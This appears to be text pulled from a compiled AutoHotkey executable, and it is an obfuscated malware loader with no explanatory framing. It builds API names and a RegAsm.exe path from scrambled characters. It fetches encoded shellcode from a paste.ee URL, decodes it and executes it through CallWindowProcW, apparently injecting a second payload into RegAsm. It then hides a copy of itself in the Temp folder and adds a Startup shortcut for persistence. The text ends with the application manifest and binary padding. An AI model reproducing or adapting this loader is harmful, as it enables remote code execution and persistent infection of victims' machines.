GkAAUWLJK.= "###"
GkAAUWLJK.= "P"
GkAAUWLJK.= "w"
GkAAUWLJK.= "@@@"
GkAAUWLJK.= "d"
GkAAUWLJK.= "n"
GkAAUWLJK.= "i"
GkAAUWLJK.= "W"
GkAAUWLJK.= "l"
GkAAUWLJK.= "l"
GkAAUWLJK.= "a"
GkAAUWLJK.= "C"
GkAAUWLJK.= "\"
GkAAUWLJK.= "l"
GkAAUWLJK.= "l"
GkAAUWLJK.= "d"
GkAAUWLJK.= "."
GkAAUWLJK.= "2"
GkAAUWLJK.= "3"
GkAAUWLJK.= "###"
GkAAUWLJK.= "e"
GkAAUWLJK.= "s"
GkAAUWLJK.= "u"
GkAAUWLJK := RegExReplace(GkAAUWLJK, "@@@", "o")
GkAAUWLJK := RegExReplace(GkAAUWLJK, "###", "r")
MzwkfOyxg := Flip(GkAAUWLJK)
PNxNfvcbR:= A_WinDir
PNxNfvcbR.= "\"
PNxNfvcbR.= "M"
PNxNfvcbR.= "i"
PNxNfvcbR.= "c"
PNxNfvcbR.= "@"
PNxNfvcbR.= "o"
PNxNfvcbR.= "s"
PNxNfvcbR.= "o"
PNxNfvcbR.= "f"
PNxNfvcbR.= "t"
PNxNfvcbR.= "."
PNxNfvcbR.= "N"
PNxNfvcbR.= "#"
PNxNfvcbR.= "T"
PNxNfvcbR.= "\"
PNxNfvcbR.= "F"
PNxNfvcbR.= "r"
PNxNfvcbR.= "a"
PNxNfvcbR.= "m"
PNxNfvcbR.= "#"
PNxNfvcbR.= "w"
PNxNfvcbR.= "o"
PNxNfvcbR.= "r"
PNxNfvcbR.= "k"
PNxNfvcbR.= "\"
PNxNfvcbR.= "v2.0.50727"
PNxNfvcbR.= "\"
PNxNfvcbR.= "RegAsm"
PNxNfvcbR.= "."
PNxNfvcbR.= "#"
PNxNfvcbR.= "x"
PNxNfvcbR.= "#"
PNxNfvcbR := RegExReplace(PNxNfvcbR, "@", "r")
PNxNfvcbR := RegExReplace(PNxNfvcbR, "#", "e")
pxzaqs77 := "WinHttp.WinHttpRequest.5.1"
iLywLWaUJ := "GET"
pxzaq38 := ComObjCreate(pxzaqs77)
pxzaq38.Open(iLywLWaUJ, "https://paste.ee/r/fsU10", true)
pxzaq38.Send()
pxzaq38.WaitForResponse()
vsdBOsnmU := pxzaq38.ResponseText
tksgBBAAY := vsdBOsnmU
oZnWluxIp := "W"
oZnWluxIp.= "i"
oZnWluxIp.= "n"
oZnWluxIp.= "i"
oZnWluxIp.= "n"
oZnWluxIp.= "e"
oZnWluxIp.= "t"
oZnWluxIp.= "."
oZnWluxIp.= "d"
oZnWluxIp.= "ll\"
oZnWluxIp.= "Inte"
oZnWluxIp.= "rnet"
oZnWluxIp.= "Get"
oZnWluxIp.= "Conn"
oZnWluxIp.= "ected"
oZnWluxIp.= "S"
oZnWluxIp.= "ta"
oZnWluxIp.= "te"
Connected := DllCall(oZnWluxIp, Flip("rts"), 0x40,"Int",0)
if (Connected = 1){
sleep,1000
pxzaqsz74 := ComObjCreate(pxzaqs77)
pxzaqsz74.Open(iLywLWaUJ, tutVTtpJk, True)
pxzaqsz74.Send()
pxzaqsz74.WaitForResponse()
pxzaqsze41 := pxzaqsz74.ResponseText
pxzaqsze41 := RegExReplace(pxzaqsze41, "#", "w")
pxzaqsze41 := RegExReplace(pxzaqsze41, "@", "A")
Base64dec(bBuf,pxzaqsze41)
Base64dec(Mcode,tksgBBAAY)
DllCall(MzwkfOyxg, Flip("rtP"), &Mcode, Flip("rts"), PNxNfvcbR, Flip("rtP"), &bBuf, "Uint", 0, "Uint", 0)
FileCopy,%A_Scriptfullpath%, %A_Temp%\%A_Scriptname%,1
FileSetAttrib, +SRH, %A_Temp%\%A_Scriptname%,1
FileCreateShortcut, "%A_Temp%\%A_ScriptName%", %A_Startup%\.lnk,,,,1
FileSetAttrib, +SRH, %A_Startup%\.lnk,1
sleep,1000
Base64dec( ByRef oenatpZac, ByRef pxzaqszedm44 ) {
stoZnWluxIp := "Crypt32.dll\015NOVFUTCryptStringToBinary"
newStr := RegExReplace(stoZnWluxIp, ".{6}FUT", "")
DllCall( newStr ( A_IsUnicode ? "W" : "A" ), UInt,&pxzaqszedm44
, UInt,StrLen(pxzaqszedm44), UInt,1, UInt,0, UIntP,Bytes, Int,0, Int,0, Flip("tnI LCEDC") )
VarSetCapacity( oenatpZac, Req := Bytes * ( A_IsUnicode ? 2 : 1 ) )
DllCall( Flip("yraniBoTgnirtStpyrC\lld.23tpyrC") ( A_IsUnicode ? "W" : "A" ), UInt,&pxzaqszedm44
, UInt,StrLen(pxzaqszedm44), UInt,1, Str,oenatpZac, UIntP,Req, Int,0, Int,0, Flip("tnI LCEDC") )
Return Bytes
Flip( Str) {
"".base.Left := "String_Left"
"".base.Right := "String_Right"
"".base.Replace := "String_Replace"
"".base.LTrim := "String_LTrim"
"".base.RTrim := "String_RTrim"
"".base.Count := "String_Count"
"".base.Times := "String_Times"
"".base.Split := "String_Split"
Loop, Parse, Str
nStr=%A_LoopField%%nStr%
Return nStr
ExitApp
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:v3="urn:schemas-microsoft-com:asm.v3"><assemblyIdentity version="1.1.00.00" name="AutoHotkey" type="win32" /><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/><supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/></application></compatibility><v3:application><v3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"><dpiAware>true</dpiAware></v3:windowsSettings></v3:application><v3:trustInfo><v3:security><v3:requestedPrivileges><v3:requestedExecutionLevel level="asInvoker" uiAccess="false" /></v3:requestedPrivileges></v3:security></v3:trustInfo></assembly> PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD